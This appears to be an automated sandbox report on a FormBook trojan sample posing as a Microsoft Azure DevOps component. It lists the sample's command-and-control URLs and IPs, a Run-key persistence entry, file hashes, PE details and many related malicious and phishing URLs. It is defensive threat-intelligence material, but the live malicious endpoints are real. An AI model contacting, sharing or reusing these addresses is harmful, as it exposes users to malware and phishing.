3.0.ByteCodeGenerator.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
12.0.explorer.exe.f50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.ByteCodeGenerator.exe.5250000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
td-ccm-168-233.wixdns.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.coraroseromance.net/aet3/?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx	0%	Avira URL Cloud	safe
www.coraroseromance.net/aet3/	0%	Avira URL Cloud	safe
https:///AzureRMAudienceEndpoint;https://management.azure.com/5https://graph.windows.net/Ihttps://ma	0%	Avira URL Cloud	safe
http://www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx	0%	Avira URL Cloud	safe
https://www.coraroseromance.net/aet3?l48p=X6tC1H3r17TreXHELX	0%	Avira URL Cloud	safe
http://www.foldemforever.com/aet3/?l48p=kapzR8JPYtO2Wg0hfvI2cMfxoG1KoiKvyBJf4rs85HfCQVdH/hem3I02OclTyA2jLT1l&vHn=5j90bfXx9vsx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.loveuco.com	203.170.80.250	true	true		unknown
td-ccm-168-233.wixdns.net	34.117.168.233	true	true	0%, Virustotal, Browse	unknown
foldemforever.com	34.102.136.180	true	false		unknown
www.fuugiti.xyz	104.21.18.171	true	true		unknown
www.budurr.com	173.239.8.164	true	false		unknown
www.rapiturs.com	162.213.255.237	true	true		unknown
www.coraroseromance.net	unknown	unknown	true		unknown
www.foldemforever.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.coraroseromance.net/aet3/?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx	true	Avira URL Cloud: safe	unknown
www.coraroseromance.net/aet3/	true	Avira URL Cloud: safe	low
http://www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx	true	Avira URL Cloud: safe	unknown
http://www.foldemforever.com/aet3/?l48p=kapzR8JPYtO2Wg0hfvI2cMfxoG1KoiKvyBJf4rs85HfCQVdH/hem3I02OclTyA2jLT1l&vHn=5j90bfXx9vsx	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://login.microsoftonline.com/	SecuriteInfo.com.Variant.Tedy.130342.18814.exe, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp	false		high
https:///AzureRMAudienceEndpoint;https://management.azure.com/5https://graph.windows.net/Ihttps://ma	SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	low
https://graph.windows.net/	SecuriteInfo.com.Variant.Tedy.130342.18814.exe	false		high
https://login.microsoftonline.com/)AadApplicationTenantIf8cdef31-a31e-4b4a-93e4-5f571e91255a	SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp	false		high
https://www.coraroseromance.net/aet3?l48p=X6tC1H3r17TreXHELX	explorer.exe, 0000000C.00000002.714030673.0000000005C32000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://management.azure.com/	SecuriteInfo.com.Variant.Tedy.130342.18814.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.18.171	www.fuugiti.xyz	United States	13335	CLOUDFLARENETUS	true
203.170.80.250	www.loveuco.com	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
34.102.136.180	foldemforever.com	United States	15169	GOOGLEUS	false
34.117.168.233	td-ccm-168-233.wixdns.net	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	640202
Start date and time: 06/06/202223:30:22	2022-06-06 23:30:22 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Variant.Tedy.130342.18814.29997 (renamed file extension from 29997 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@7/1@6/4
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 48.8% (good quality ratio 44.8%) Quality average: 71.7% Quality standard deviation: 31.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 146 Number of non-executed functions: 160
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.242.101.226, 52.152.110.14, 40.125.122.176, 20.223.24.244, 20.54.89.106
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, licensing.mp.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target SecuriteInfo.com.Variant.Tedy.130342.18814.exe, PID 7000 because it is empty
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
23:33:55	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run -Z9L_RJ0AN4 C:\Program Files (x86)\Lnp-47bm\chkdsk_0slor5.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
203.170.80.250	gZU26RjMUU.exe	Get hash	malicious	Browse	www.exceedrigging.online/ocgr/?8p=qVwdVxLX0&1bEX=lpHABYYuY9cv3qxwBx7M5sV/ehU3dY7dp0OhYiYvhJ7rkfr4y7gNIHxTi8LWiO7UdxYH
	ENCOMENDA LOIAS BARRO.xlsx	Get hash	malicious	Browse	www.exceedrigging.online/ocgr/?udwl-=lpHABYYrY6cr3698Dx7M5sV/ehU3dY7dp0WxEhEulp7qkuH+1rxBeDJRhaHQp/vfIXswjA==&bDHTL=XL0tsfBPFZ
	SecuriteInfo.com.Variant.MSILHeracles.36859.7349.exe	Get hash	malicious	Browse	www.goodlordy.net/tn61/?oL3LlJe=11Y0jg2guPgWMpDOrlnJajYS6uNk4svBrv7OHBQ/XILJr+M/OrnfiCKZ18ANmYSJ8MD7&l0Dlp=cZ2PFFnHMnDxhx
	triage_dropped_file.exe	Get hash	malicious	Browse	www.onlinearttherapytraining.store/pogm/?Wd6po=7nFLSLwH3XR&Z2ML=0d3xZoIp0kdes9ny5pi7TBsliBznwHfCiFYRa4QbtIZLgEYLLH9jxfu/V6ACadxLtEiR
	NIEUWE AANKOOPORDER.exe	Get hash	malicious	Browse	www.keepcharged.online/s4ig/?UV8810Q=jWXH379Df8ztfRkrXn63Xlz5pUC92+8eRclzTdM4WwojYTfL0XSfonU8MTFuKLTRV6Wb&u8=4htl94fpy
	SWIFT Message.xlsx	Get hash	malicious	Browse	www.hypotheque.xyz/u6vb/?6lip4=trAhLfEH&Sl-pp4=c3IKG2JsHNtK5zl36fCvIXy36K8P53oVDVMMpHFW1VhyR0x4TQnK1PBS6C4g5RbAiUShcQ==
	Booking number 63200IN437668.exe	Get hash	malicious	Browse	www.vinayagar.xyz/dvcw/?e6m0BD=sf+UYiDhtehr5fU3UUK4lZTAKcVjt5jfQy4PZuU9KVGDENPpP5JBNe4RxtXTmspsivq9&_txtHD=LZqLWroXC
	ODFkNglL18.exe	Get hash	malicious	Browse	www.hypotheque.xyz/u6vb/?d2=c3IKG2JpHKtO5jp74fCvIXy36K8P53oVDVUc1EZXx1hzRFd+UA2GjL5Q5nU29BfzpXPR&4hLT6=9r_Xq4bPK8itcl2p
	LyY2cmtWjb.exe	Get hash	malicious	Browse	www.tehoierenursery.online/dpzz/?oBZh=nQxT3wtJ43goNFGbqxp3LLqoykZM+ebY85UW0yuEn/s6viNE+8TCyMtn3mH9SRJKgY/JfUEO7Q==&i0=xHvXCL
	j2dNDqM2JY.exe	Get hash	malicious	Browse	www.farmstoragesolution.com/h4d0/?2dYhmpu=F2rrJ5ReEd4LrP5/UuuH3AoM21qgVCpNiBAHACju9J0ow42Hi84AgvxBuz92v76uvptG&k2MT5=bZB0dRC8
	purchase_order.exe	Get hash	malicious	Browse	www.universitysuccess.net/fui6/?3fdLibf0=RwFJjzagwk1eo6/3hqfDiQm8y5W2E1C6wzdG7Cu4zQwdVTcBTAvnDThO0YpyxPTvtm+4&yD=od94ulb0
	9nM1eSsQgX.exe	Get hash	malicious	Browse	www.mugsmindset.online/sbp5/?8p=rGgRi1v2ZQtEhSvMK9/Z4o4A37pNj53pyOvHh8zdl7xQErTb2p9Byy/EEdKTjOL/bmlG&0L00=4hwxUT-XILw
	justifika Payment details.exe	Get hash	malicious	Browse	www.a-mech.online/g0s6/?fTyPr=rotWKh0O+5j4vKXnlvS7GL1M6aL5f3/63WCE3rSYmjfM/i3pj0MQo4LlqtWGlZ2EA1W8&I4ah=w2MTqnnpWZSPKVw0
	draft_inv dec21.exe	Get hash	malicious	Browse	www.mackthetruck.com/n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL
	hNfqWik7qw.exe	Get hash	malicious	Browse	www.adelaideofficefitouts.com/rht9/?2d=d2RqHiFP7GtRsEFRKn4ztcJimb1zZosbxe5lPiT3HeEgy+1zxLvhIbh4BNC8Wn2mcAjG&NTiPcP=i488q
	STATEMENT .doc	Get hash	malicious	Browse	www.mentation.online/bcwg/?CB3=YVmXGh8&eZ=yiId+2ekP1XS4WwOOSMXCrdt22hgudsZh6QSgOVem0oOHO44eh2BiSC3PJghWo4IKeaAnw==
	BL_CI_PL.exe	Get hash	malicious	Browse	www.mackthetruck.com/n8ds/?lZOD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&E0Dpk=l8hHaF
	LBHkeG0UJk1YkgS.exe	Get hash	malicious	Browse	www.tileonsale.online/a96n/?3fe=PBIGLrxEdW1ARb4E4Y/g+5oa3ioxDHC57jksxPNeqemN6ZgQynee/Bq7aFoZn10xYjrn&p6DDcf=5j0lqHmh
	Zr26f1rL6r.exe	Get hash	malicious	Browse	www.mackthetruck.com/n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z
	DHL express 5809439160_pdf.exe	Get hash	malicious	Browse	www.milanecollective.online/asva/?kPMHc8=_0Dd-Hq&0DHp3RF=7aaX/J2ETrbHcNqJ083e19LFvcBNT4ZfrDwr//xwcvRFhpQMdOXGJNS6rbnCanORiSHJi1ccfQ==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
td-ccm-168-233.wixdns.net	Order confirmation 5679021.exe	Get hash	malicious	Browse	34.117.168.233
	SecuriteInfo.com.Variant.MSILHeracles.37221.26211.exe	Get hash	malicious	Browse	34.117.168.233
	statement of account.exe	Get hash	malicious	Browse	34.117.168.233
	SecuriteInfo.com.Gen.Variant.Nemesis.7037.24196.exe	Get hash	malicious	Browse	34.117.168.233
	two_months_salary_receipts.exe	Get hash	malicious	Browse	34.117.168.233
	BILL OF LADING-CI-PL-BL_xlsx.exe	Get hash	malicious	Browse	34.117.168.233
	Bill Of Lading-Original_xlsx.exe	Get hash	malicious	Browse	34.117.168.233
	Commercial Invoice_xlsx.exe	Get hash	malicious	Browse	34.117.168.233
	PackingList_xlsx.exe	Get hash	malicious	Browse	34.117.168.233
	DHL Delivery Exception.exe	Get hash	malicious	Browse	34.117.168.233
	SWIFT_Copy.exe	Get hash	malicious	Browse	34.117.168.233
	dD2niauWUc.exe	Get hash	malicious	Browse	34.117.168.233
	listXofXP.O.doc	Get hash	malicious	Browse	34.117.168.233
	m16h7WmaNB.exe	Get hash	malicious	Browse	34.117.168.233
	TETSA ISI PRICE-STOCK REQUEST.exe	Get hash	malicious	Browse	34.117.168.233
	2wPn8Csqon.exe	Get hash	malicious	Browse	34.117.168.233
	Company Profile.exe	Get hash	malicious	Browse	34.117.168.233
	https://businessadmin.org/	Get hash	malicious	Browse	34.117.168.233
	swift copy 6209143.exe	Get hash	malicious	Browse	34.117.168.233
	TT COPY Euro 57,890_CI0099484_pdf.vbs	Get hash	malicious	Browse	34.117.168.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	mirai.arm	Get hash	malicious	Browse	162.159.107.63
	https://u27223624.ct.sendgrid.net/ls/click?upn=lXMq6SwSkfecES5XpB-2FX61rwHHnpblHhrGRmaHQeozgPgN9I7UAght-2Fa9VCBfLfv1DabrxxqXKW2wHtVhpvG0rJhpRTMnOWvPTupsR2utc-2FrMAAlt9NmMhrKA3Vl4BNu0MW7Il1xmVODr3-2FMjhIS7LMsE0MDJFBoTzaquOvNJuw3KnQLr9n6lGYToFOWPqd2qdsr_LeMOfyZfDbx9s8KYxuEQmlXXvNFAZly1SNTZtfJY0h806ud-2B2He1ljQ0JQ7F3yswgQQptwkwyGfFeV857rx8jJbpapJw1C1hanu7YpSxDlhrYgoWDHrwOF9wWnz6c73xVSvCA5GGMy30Sz9lZmnKiKmTOa6AEB8vJFpe2sW-2BK5ThiULizQ-2FbiJRiO0cW-2BoAV527Pxck5m9aC9o4Kb0a6IDogcCwJIOOXR24h2pOGYru-2BpybSfUO0B1qDP2D2S8bJCZOoTf0NtKNs6NP-2BSyYPjZAHH8CYLfLgace5sEc-2B9KkDB5qN9FdhHmXSo-2FNJgeAKSRrD6kq4UW7mLZ4feFW0IRaDgJwMdQHsBEulRj26yaWyQnNFbTL32tvL2XvPn4IEB59hdWh9av1s8wDFvYfOSP1emGAjlqv03AfRegXfXYpMOZ6z-2Bw32jH3i1nBpEDGYopcqJhZ6fSeY1r0b7-2BXq294mvKddBuXAoR8uYuhQzN5vjwtFRF4i-2FnhoZVqT550dIY0jJhJpZx5HdrfwAplgSJyaqMvVT5YDLP6zFtmSIxtUr2ULHDiyoC2ZeqZDSbqulIIOcnTk2Pwd8WBHvacvVD-2Bc14yHPgk70lOryJY9e5qnMr5sixEpEssdq6UpEfwSExOejnb0neJefSFJItVVdjRr9FwLylIn4Rz-2BYQWyfT06kEDXzC7-2Fb-2BRgr2Nte7zPjF9J6H6dWZ3TO4L5C7JMSnySolrLXcUUAP5umX2p31XL-2FdkQFVX-2FvKoidSdihPInEuAOdWI1j9hzoAGhHvgihzB2QguTb0UI69IhpD-2F04yAWxjsiROcIlsn6ZkQGjPYs8hmDeoVvaju8LZNHjTuCvLMJwx1XIr-2Fjwlp6jRjYyFVWPQmtQnxNDijYoqRCstxd	Get hash	malicious	Browse	104.17.25.14
	SecureMessageAtt.htm	Get hash	malicious	Browse	104.18.11.207
	C9Xo1blOWE	Get hash	malicious	Browse	104.29.0.176
	apep.x86	Get hash	malicious	Browse	172.68.102.186
	https://katiebanks.alboompro.com/questfill	Get hash	malicious	Browse	104.17.146.91
	http://myritejusrrt.com/sharefile/	Get hash	malicious	Browse	104.18.10.207
	http://dakqcdfsnp.malabarrx.com/#.aHR0cHM6Ly9zdG9yYWdlYXBpLmZsZWVrLmNvL2NlZmJhYjNmLWJkZmUtNDc4ZS05NDFjLWEyYThhM2JmMTQ2YS1idWNrZXQvbGx5L2luZGV4Lmh0bT9lbWFpbD1zdXNhbl9nb21lekBmZC5vcmc=	Get hash	malicious	Browse	104.17.25.14
	https://wp20.ru/t922555594/	Get hash	malicious	Browse	172.67.181.197
	https://wp20.ru/t476525124/	Get hash	malicious	Browse	104.21.35.251
	https://r.smtp.trigo-group.com/tr/cl/cnUPg73igMp2gSFYm1DYt5UIjtVZc5gV8BaIgQw7s-PllnR_XUno-B4dhxnYryZ3ISaxXguvWSB2lXXWHGYcKYEkChHXnLpMvfubdwQGOhT93ZxJ_vWyxfojnc34Fousm9DNiOjwr09beglbV0r9WMJzm-NxkvLQjnwCeCxzsshqeMOz6NQx1LjzxA1SGXFdeG2IuDFTJAZhzplDO9o3cw7vODoLNSPsjEr5gOgzwroMrVZRwyL7dkPyKruqYyRZopi4tS0ow5-xAgOqdDWYfwe2YSJiv3VBr5h-hYMEcl0V6Y3tVZ8ys1_WJScZ_x-UWg	Get hash	malicious	Browse	104.18.11.207
	http://clearlane.co.vu/tread/index.html	Get hash	malicious	Browse	104.18.11.207
	http://clearlane.co.vu/tread/index.html?_sm_au_=iHVZttq5Qzrf7sMt	Get hash	malicious	Browse	104.18.11.207
	http://dolphin-app-cb6dz.ondigitalocean.app/werrx01/?phone=+1-855-484-2062&tblci=GiDY8OOFJ4OWyG0YghlYPduRPIcwKwtLwvOZ0P-6j4F8pCCw_lgoo9m7gaGquIOaAQ&utm_medium=referral&utm_source=taboola	Get hash	malicious	Browse	104.18.11.207
	http://srhuxpajna.malabarrx.com/#.aHR0cHM6Ly9zdWJzZXF1ZW50LmdsaXRjaC5tZS9pbmRleC5odG0/ZW1haWw9bGV3aXMuYnVybnMtYWxsYW5AZ2xvYmFsLmNvbQ==	Get hash	malicious	Browse	188.114.97.3
	https://formcrafts.com/a/vendor	Get hash	malicious	Browse	104.16.122.175
	https://r20.rs6.net/tn.jsp?t=qcuzd54ab.0.0.sqy9yutab.0&1d=preview&r=3&p=https%3A%2F%2F6z81j5.codesandbox.io?dg=cnZpbmNlbnRAaWNvbmVjdGl2LmNvbQ==	Get hash	malicious	Browse	104.18.18.132
	sxwJhFA5pT.exe	Get hash	malicious	Browse	188.114.97.3
	https://bymwx1.axshare.com	Get hash	malicious	Browse	104.17.212.204
	PO2762712 and Company Profile.exe	Get hash	malicious	Browse	162.159.129.233

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Variant.Tedy.130342.18814.exe.log

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.348034597186669
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLU84qpE4Ks2wKDE4KhK3VZ9pKhk
MD5:	D4AF6B20AEA9906B4FF574A174E96287
SHA1:	81655019BB100FAADD5B36755F798EE5FB09E672
SHA-256:	DD8AE93DA079839B31327D22A2408E0C3EA4DDE92FD389CD5B96AD57CCE7B2E1
SHA-512:	6D912AC17876D9C21E61ED8C1B435AEA0FBB27FB97626A40903B4DFFC1204BEF3A43B02805DEDD2531822FD6F62CF06F0D758C1B2CA07258E82F95225D71C16E
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.118963567258477
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	SecuriteInfo.com.Variant.Tedy.130342.18814.exe
File size:	1932800
MD5:	9042135a78a25e60669964f0e673d764
SHA1:	0186f581ebb95406ea4f1a631080f2b60fa364fa
SHA256:	f85d2878993aa3b49cc697b8b4dd73c75abd3a6e5891d0a6121da7aa272cc666
SHA512:	d4c49b394db14d6b275ba1447568dd31c9ffb0e1eb0173459339fff673ad2b874017cef6a217ded862c048f4bbc69138bc64c1b7501f1e3e344553946e2a1f30
SSDEEP:	24576:VlerLa/fP+WSnWMI/fbsWiCLEy5fq+z5fq+sOT75fq+W5fq+tJX5fq+z0sz5fq+8:ecP/Sn9AfbsirOEIZJVXG
TLSH:	1D95D015B360EB4BC22AB33B9865F73502661BC6BE17E7459534BAE33C523818F607D2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....d].........."...0.................. ........@.. ....................................`................................

File Icon


Icon Hash:	0325656d6d67291f

Static PE Info

General

Entrypoint:	0x5cfa04
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0x5D641EF9 [Mon Aug 26 18:03:37 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cf8ec	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d0000	0x9d70	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1da000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1cf936	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1cda0a	0x1cdc00	False	0.704568430225	data	7.09655147134	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x1d0000	0x9d70	0x9e00	False	0.96640130538	data	7.89311690155	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1da000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1d00e8	0x9771	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x1d985c	0x14	data
RT_VERSION	0x1d9870	0x500	data	English	United States

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Assembly Version	16.0.0.0
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	Microsoft.VisualStudio.Services.Client.Interactive.dll
FileVersion	16.153.29226.1 built by: releases/M153 (3d1d32e8a5)
CompanyName	Microsoft Corporation
Comments	f15756cb
ProductName	Microsoft Azure DevOps Server
ProductVersion	16.153.29226.1
FileDescription	Microsoft.VisualStudio.Services.Client.Interactive.dll
OriginalFilename	Microsoft.VisualStudio.Services.Client.Interactive.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.5104.21.18.17149861802031449 06/06/22-23:33:30.335478	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49861	80	192.168.2.5	104.21.18.171
192.168.2.5162.213.255.23749865802031449 06/06/22-23:33:46.702528	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49865	80	192.168.2.5	162.213.255.237
192.168.2.5104.21.18.17149861802031453 06/06/22-23:33:30.335478	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49861	80	192.168.2.5	104.21.18.171
192.168.2.5104.21.18.17149861802031412 06/06/22-23:33:30.335478	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49861	80	192.168.2.5	104.21.18.171
